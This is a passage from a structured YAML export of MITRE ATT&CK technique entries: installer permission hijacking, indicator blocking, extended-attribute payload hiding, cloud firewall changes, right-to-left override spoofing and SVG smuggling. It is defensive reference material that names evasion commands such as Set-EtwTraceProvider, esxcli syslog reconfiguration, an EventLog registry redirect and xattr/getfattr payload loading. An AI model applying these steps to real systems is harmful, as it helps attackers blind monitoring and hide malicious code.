Retrieved December 4, 2014.' url: https://seclists.org/fulldisclosure/2015/Dec/34 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:56.875Z' name: Executable Installer File Permissions Weakness description: |- Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking. Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. 
This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Travis Smith, Tripwire - Stefan Kanthak x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.1' atomic_tests: [] T1562.006: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da created: '2020-03-19T19:09:30.329Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1562/006 external_id: T1562.006 - source_name: Google Cloud Threat Intelligence ESXi VIBs 2022 description: 'Alexander Marvi, Jeremy Koppen, Tufail Ahmed, and Jonathan Lepore. (2022, September 29). Bad VIB(E)s Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors. Retrieved March 26, 2025.' url: https://cloud.google.com/blog/topics/threat-intelligence/esxi-hypervisors-malware-persistence - source_name: Broadcom Configuring syslog on ESXi description: Broadcom. (n.d.). Configuring syslog on ESXi. Retrieved March 27, 2025. 
url: https://knowledge.broadcom.com/external/article/318939/configuring-syslog-on-esxi.html - source_name: disable_win_evt_logging description: 'Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.' url: https://ptylu.github.io/content/report/report.html?report=25 - source_name: LemonDuck description: Manoj Ahuje. (2022, April 21). LemonDuck Targets Docker for Cryptomining Operations. Retrieved June 30, 2022. url: https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/ - source_name: Microsoft Lamin Sept 2017 description: Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018. url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A - source_name: Microsoft About Event Tracing 2018 description: Microsoft. (2018, May 30). About Event Tracing. Retrieved June 7, 2019. url: https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events - source_name: Medium Event Tracing Tampering 2018 description: 'Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved June 7, 2019.' url: https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:57.704Z' name: 'Impair Defenses: Indicator Blocking' description: "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. 
This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering with settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nFor example, adversaries may modify the `File` value in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging) \n\nETW interruption can be achieved in multiple ways, most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.\n\nIn Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities and facilitate follow-on behaviors. 
(Citation: LemonDuck) ESXi also leverages syslog, which can be reconfigured via commands such as `esxcli system syslog config set` and `esxcli system syslog config reload`.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)(Citation: Broadcom Configuring syslog on ESXi)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Rob Smith - Lucas Heiligenstein x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - macOS - Linux - ESXi x_mitre_version: '1.5' identifier: T1562.006 atomic_tests: [] T1564.014: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--762e6f29-a62f-4d96-91ed-d0073181431f created: '2025-03-27T19:40:00.716Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1564/014 external_id: T1564.014 - source_name: Establishing persistence using extended attributes on Linux description: Irem Kuyucu. (2024, August 6). Establishing persistence using extended attributes on Linux. Retrieved March 27, 2025. url: https://kernal.eu/posts/linux-xattr-persistence/ - source_name: Low GroupIB xattrs nov 2024 description: 'Sharmine Low. (2024, November 13). Stealthy Attributes of Lazarus APT Group: Evading Detection with Extended Attributes. Retrieved March 27, 2025.' url: https://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-09-17T17:58:26.729Z' name: Extended Attributes description: |- Adversaries may abuse extended attributes (xattrs) on macOS and Linux to hide their malicious data in order to evade detection. 
Extended attributes are key-value pairs of file and directory metadata used by both macOS and Linux. They are not visible through standard tools like `Finder`, `ls`, or `cat` and require utilities such as `xattr` (macOS) or `getfattr` (Linux) for inspection. Operating systems and applications use xattrs for tagging, integrity checks, and access control. On Linux, xattrs are organized into namespaces such as `user.` (user permissions), `trusted.` (root permissions), `security.`, and `system.`, each with specific permissions. On macOS, xattrs are flat strings without namespace prefixes, commonly prefixed with `com.apple.*` (e.g., `com.apple.quarantine`, `com.apple.metadata:_kMDItemUserTags`) and used by system features like Gatekeeper and Spotlight.(Citation: Establishing persistence using extended attributes on Linux) An adversary may leverage xattrs by embedding a second-stage payload into the extended attribute of a legitimate file. On macOS, a payload can be embedded into a custom attribute using the `xattr` command. A separate loader can retrieve the attribute with `xattr -p`, decode the content, and execute it using a scripting interpreter. On Linux, an adversary may use `setfattr` to write a payload into the `user.` namespace of a legitimate file. A loader script can later extract the payload with `getfattr --only-values`, decode it, and execute it using bash or another interpreter. 
In both cases, because the primary file content remains unchanged, security tools and integrity checks that do not inspect extended attributes will observe the original file hash, allowing the malicious payload to evade detection.(Citation: Low GroupIB xattrs nov 2024) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.3.0 x_mitre_contributors: - Sharmine Low, Group-IB - Rouven Bissinger (SySS GmbH) - RoseSecurity x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS x_mitre_version: '1.0' atomic_tests: [] T1562.007: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c created: '2020-06-24T16:55:46.243Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1562/007 external_id: T1562.007 - source_name: Expel IO Evil in AWS description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020. url: https://expel.io/blog/finding-evil-in-aws/ - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022 description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.' url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:58.515Z' name: Disable or Modify Cloud Firewall description: "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. 
Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary with appropriate permissions may introduce new firewall rules or policies to allow access into a victim cloud environment and/or move laterally from the cloud control plane to the data plane. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups (or creates new security groups entirely) to allow any TCP/IP connectivity to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022) They may also remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). 
" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Expel - Arun Seelagan, CISA x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - IaaS x_mitre_version: '1.3' atomic_tests: [] T1036.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69 created: '2020-02-10T19:55:29.385Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1036/002 external_id: T1036.002 - source_name: Trend Micro PLEAD RTLO description: Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019. url: https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/ - source_name: Kaspersky RTLO Cyber Crime description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram - Cybercriminals exploited Telegram flaw to launch multipurpose attacks. Retrieved April 22, 2019. url: https://securelist.com/zero-day-vulnerability-in-telegram/83800/ - source_name: Infosecinstitute RTLO Technique description: Security Ninja. (2015, April 16). Spoof Using Right to Left Override (RTLO) Technique. Retrieved April 22, 2019. url: https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:58.683Z' name: Right-to-Left Override description: |- Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. 
RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\u202Egnp.js will be displayed as photo_high_resj.png.(Citation: Infosecinstitute RTLO Technique) Adversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.1' atomic_tests: [] T1027.017: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--78b9e70d-1605-459c-b23d-e3a25036968c created: '2025-03-25T15:31:09.697Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1027/017 external_id: T1027.017 - source_name: Talos SVG Smuggling 2022 description: Adam Katz and Jaeson Schultz. (2022, December 13). HTML smugglers turn to SVG images. 
Retrieved March 25, 2025. url: https://blog.talosintelligence.com/html-smugglers-turn-to-svg-images/ - source_name: Trustwave SVG Smuggling 2025 description: 'Bernard Bautista and Kevin Adriano. (2025, April 10). Pixel-Perfect Trap: The Surge of SVG-Borne Phishing Attacks. Retrieved April 14, 2025.' url: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pixel-perfect-trap-the-surge-of-svg-borne-phishing-attacks/ - source_name: Bleeping Computer SVG Smuggling 2024 description: Lawrence Abrams. (2024, November 17). Phishing emails increasingly use SVG attachments to evade detection. Retrieved March 25, 2025. url: https://www.bleepingcomputer.com/news/security/phishing-emails-increasingly-use-svg-attachments-to-evade-detection/ - source_name: Cofense SVG Smuggling 2024 description: Max Gannon. (2024, March 13). SVG Files Abused in Emerging Campaigns. Retrieved March 25, 2025. url: https://cofense.com/blog/svg-files-abused-in-emerging-campaigns/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T19:58:43.263Z' name: SVG Smuggling description: "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign SVG files.(Citation: Trustwave SVG Smuggling 2025) SVGs, or Scalable Vector Graphics, are vector-based image files constructed using XML. As such, they can legitimately include `